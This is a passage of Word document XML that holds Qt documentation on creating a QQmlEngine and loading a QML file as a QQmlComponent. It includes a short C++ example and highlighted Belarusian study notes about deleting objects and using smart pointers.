          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId378" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be constructed directly instead. In this case,</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application.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is loaded as a</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId379" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlComponent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance rather than placed into a view:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlEngine</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlContext</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</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argv</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QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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QQmlEngine</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> engine</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QQmlContext</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objectContext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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w: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QQmlContext</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engine</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rootContext</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QQmlComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>engine</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"application.qml"</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QObject</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</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component</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create</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objectContext</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// ... delete object and objectContext when necessary</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690F6E" w:rsidRPr="00690F6E" w:rsidRDefault="00690F6E" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Тут вельмі важна </w:t>
      </w:r>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>выдаляць аб’екты пасля ініцыялізацыі.</w:t>
      </w:r>
      <w:r w:rsidR="002863E6" w:rsidRPr="002863E6">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> Можна выкарыстоўваць разумныя ўказацелі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="00490E7E" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId380" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QGuiApplication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be replaced by a</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId381" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QCoreApplication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in the code above in case you are not using any graphical items from Qt Quick. </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows using QML as a language without any dependencies to the</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId382" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="002863E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt GUI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="00690F6E" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>See</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId383" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml-cppintegration-exposecppattributes.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{Exposing Attributes of C++ Types to QML} for more information about using</w:t>
      </w:r>
      <w:r w:rsidR="002863E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId384" w:history="1">
        <w:r w:rsidRPr="002863E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002863E6" w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId385" w:history="1">
        <w:r w:rsidRPr="002863E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
